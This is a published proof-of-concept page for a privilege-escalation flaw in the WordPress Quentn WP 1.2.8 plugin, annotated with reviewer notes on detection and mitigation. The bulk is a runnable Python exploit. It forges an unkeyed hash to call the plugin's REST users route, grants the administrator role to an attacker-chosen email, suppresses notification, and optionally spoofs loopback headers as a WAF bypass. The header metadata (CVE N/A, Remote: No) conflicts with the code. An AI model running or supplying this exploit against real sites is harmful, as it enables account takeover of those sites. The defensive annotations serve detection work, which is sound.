WordPress Quentn WP 1.2.8 Privilege Escalation

2025.09.30
Credit: Nxploited
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Proof-of-concept published for "WordPress Quentn WP 1.2.8 Privilege Escalation".

Reviewer notes (defensive reading of what the script shows):

* Identifier: the page header lists "CVE: N/A", while the argparse description
  in main() names CVE-2025-39596. The header also lists "Remote: No", but the
  script reaches the target over HTTP(S) via the WordPress REST API.
* Request shape: a single POST to /wp-json/quentn/api/v1/users whose JSON body
  carries "data" (base64 of a JSON document), "vu" (a Unix timestamp) and
  "hash" (SHA-256 hex of data + vu + key).
* Root cause is not described on the page. When no key is given (the default),
  the hash is computed from values that are all present in the request, so it
  proves nothing about the sender. Presumably the affected version accepts
  such a hash when the plugin key is empty or unset -- confirm against the
  vendor advisory before relying on this.
* Effect requested: add a role (default "administrator") to the user identified
  by an e-mail address.

Detection ideas grounded in the code below:

* POST requests to /wp-json/quentn/api/v1/users from unexpected sources.
* Literal markers this script sends: header "X-Nxploited", "Nxploited" inside
  the User-Agent, and with --extra also "Nxploited-Skip: true",
  "Referer: https://google.com/Nxploited", "X-Forwarded-For: 127.0.0.1" and
  "Forwarded: for=127.0.0.1". These are weak indicators specific to this
  script; anchor alerts on the route and on unexpected role changes instead.
* Response bodies containing "Data Successfully Updated" for that route.

Mitigation: update the plugin to a release the vendor documents as fixed
(<fixed-version: not stated on this page>), make sure a non-empty API key is
configured, and audit accounts that hold or recently gained the administrator
role.
"""
import argparse
import base64
import hashlib
import json
import random
import requests
import time
import urllib3
from urllib.parse import urlparse


def print_banner():
    """Print the author's ASCII-art banner and credit line."""
    # The page extraction collapsed the banner's line breaks into single
    # spaces; the literal is kept exactly as it appears on the page.
    banner = r""" @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@! @@@ !@@ @@! @@@ !@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! @!@ !@! !@! @!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@!!@!! !!@@!! !!@!!@!! !!@@!@! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!@!!! @!!@!!! !!@!!! @!!@!!!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!! !:! !!! !:! !:! :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: !:! !:! !:! :!: !:! ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::::: :: :::: :: ::::: :: :::: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : : : : :: : : : : : :: : : """
    print(banner)
    print("Nxploited | Khaled Alenazi\n")


def gen_headers(cookie=None, add_extra=False):
    """Build the HTTP request headers.

    Args:
        cookie: optional Cookie header value; added only when truthy.
        add_extra: when true, adds the Referer, X-Forwarded-For, Forwarded,
            Nxploited-Skip and Accept headers set below.

    Returns:
        dict of header name to value.
    """
    # Every candidate User-Agent contains the literal "Nxploited", and the
    # chosen one gets " | Nxploited" appended, so the string is always present.
    agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        "Nxploited/2.0 (Special Edition)",
        "Mozilla/5.0 Nxploited",
        "Nxploited-Bypass/7.0",
        "Nxploited-Advanced/1337"
    ]
    h = {
        "User-Agent": random.choice(agents) + " | Nxploited",
        "X-Nxploited": "Nxploited",
        "Content-Type": "application/json",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "close"
    }
    if add_extra:
        # NOTE(review): the client claims a loopback origin here. Servers and
        # WAF rules should only honour X-Forwarded-For / Forwarded when the
        # header was set by a proxy they operate, never as received from a
        # client.
        h["Referer"] = "https://google.com/Nxploited"
        h["X-Forwarded-For"] = "127.0.0.1"
        h["Forwarded"] = "for=127.0.0.1"
        h["Nxploited-Skip"] = "true"
        h["Accept"] = "*/*"
    if cookie:
        h["Cookie"] = cookie
    return h


def build_inner_json(email, fname, lname, role):
    """Return the inner document: one user record, one role to add, notify off.

    "notify" is False in every request built here.
    NOTE(review): presumably this suppresses a notification on the target site
    -- confirm against the plugin; if so, the change will not show up in mail,
    so review role changes directly.
    """
    return {
        "data": {
            "users": [
                {
                    "email": email,
                    "first_name": fname,
                    "last_name": lname
                }
            ],
            "roles": {
                "add_roles": [role]
            },
            "notify": False
        }
    }


def encode_payload(inner_json):
    """Serialise the inner document to JSON and return it base64-encoded as str."""
    return base64.b64encode(json.dumps(inner_json).encode()).decode()


def gen_vu():
    """Return a Unix timestamp 1800 to 3700 seconds after the current time.

    NOTE(review): the field name and its use in the hashed payload suggest a
    "valid until" expiry -- confirm against the plugin.
    """
    return int(time.time()) + random.randint(1800, 3700)


def build_hash(b64_data, vu, key):
    """Return the SHA-256 hex digest of b64_data + vu (+ key when key is truthy).

    With an empty key the digest covers only values that travel in the request
    itself, so a server that accepts it is not authenticating the sender.
    """
    raw = f"{b64_data}{vu}{key}" if key else f"{b64_data}{vu}"
    return hashlib.sha256(raw.encode()).hexdigest()


def build_payload(email, fname, lname, role, key):
    """Assemble the outer request body: {"data", "vu", "hash"}."""
    inner_json = build_inner_json(email, fname, lname, role)
    b64_data = encode_payload(inner_json)
    vu = gen_vu()
    hash_val = build_hash(b64_data, vu, key)
    return {
        "data": b64_data,
        "vu": vu,
        "hash": hash_val
    }


def normalize_url(url):
    """Reduce *url* to scheme and host and append the plugin's REST route.

    The scheme falls back to "http" unless it is "http" or "https". When the
    parsed URL has no netloc, its path is used as the host. Any path on a URL
    that does have a netloc is discarded.
    """
    parsed = urlparse(url, "http")
    scheme = parsed.scheme if parsed.scheme in ["http", "https"] else "http"
    netloc = parsed.netloc if parsed.netloc else parsed.path
    # This route is the stable element of the request; log and alert on it.
    return f"{scheme}://{netloc.rstrip('/')}/wp-json/quentn/api/v1/users"


def send_exploit(url, payload, headers, proxies=None, verify_ssl=False):
    """POST the JSON payload and return the response, or the exception raised.

    Returns:
        The requests response object on success; otherwise the caught
        exception instance (returned, not raised).
    """
    # InsecureRequestWarning is silenced on every call, including when
    # certificate verification is enabled.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        r = requests.post(url, headers=headers, data=json.dumps(payload), timeout=20, proxies=proxies or {}, verify=verify_ssl)
        return r
    except Exception as e:
        return e


def is_success(response):
    """Classify the result of send_exploit().

    Returns:
        (bool, str): True when the response text contains
        "Data Successfully Updated"; otherwise False with either the request
        error or the status code and the first 256 characters of the body.
    """
    if isinstance(response, Exception):
        return False, f"Request Error: {response}"
    # The same marker in web server or application logs for this route is a
    # sign that a request of this kind was accepted.
    if "Data Successfully Updated" in response.text:
        return True, "Exploit Success By | Nxploited"
    return False, f"{response.status_code} | {response.text[:256]}"


def main():
    """Parse the command line, send one request and print the outcome."""
    print_banner()
    # The description carries the only CVE id that appears on this page.
    parser = argparse.ArgumentParser(description="CVE-2025-39596 | Nxploited")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    # NOTE(review): the help text says "new admin account" while the success
    # marker reads "Data Successfully Updated"; whether the server creates or
    # updates the user cannot be told from this script.
    parser.add_argument("-e", "--email", required=True, help="Email for new admin account")
    parser.add_argument("-f", "--fname", default="Pwn", help="First name")
    parser.add_argument("-l", "--lname", default="Admin", help="Last name")
    parser.add_argument("-r", "--role", default="administrator", help="Role to assign")
    # Defaults to an empty key, which makes build_hash() produce an unkeyed digest.
    parser.add_argument("-k", "--key", default="", help="Quentn API key if known")
    parser.add_argument("--cookie", default=None, help="Add cookie for authenticated bypass if needed")
    parser.add_argument("--proxy", default=None, help="Proxy (ex: http://127.0.0.1:8080)")
    parser.add_argument("--skip-ssl", action="store_true", help="Skip SSL verification")
    parser.add_argument("--extra", action="store_true", help="Add extra headers (bypass/WAF/etc)")
    args = parser.parse_args()
    endpoint = normalize_url(args.url)
    payload = build_payload(args.email, args.fname, args.lname, args.role, args.key)
    proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None
    headers = gen_headers(args.cookie, args.extra)
    # Certificate verification stays on unless --skip-ssl is given.
    response = send_exploit(endpoint, payload, headers, proxies, not args.skip_ssl)
    ok, msg = is_success(response)
    print(msg)


if __name__ == "__main__":
    main()

